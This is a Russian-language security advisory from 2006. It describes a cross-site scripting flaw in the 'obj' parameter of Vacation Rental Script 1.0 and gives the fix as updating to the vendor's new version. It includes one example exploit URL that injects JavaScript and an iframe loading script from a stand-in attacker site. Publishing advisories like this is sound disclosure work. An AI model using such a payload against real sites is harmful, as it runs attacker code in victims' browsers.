Межсайтовый скриптинг в Vacation Rental Script

Дата публикации:
05.06.2006
Всего просмотров:
1026
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Vacation Rental Script 1.x
Уязвимые версии: Vacation Rental Script 1.0, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "obj". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://victim/index.php?obj=<INPUT%20TYPE="IMAGE"%20SRC=javascript:alert('XSS');><iframe%20src=http://www.evilsite.com/code.js>

URL производителя: www.vacationrentalscript.com

Решение: Установите обновленную версию с сайта производителя.

Ссылки: Vacation Retal Script v1.0

или введите имя

CAPTCHA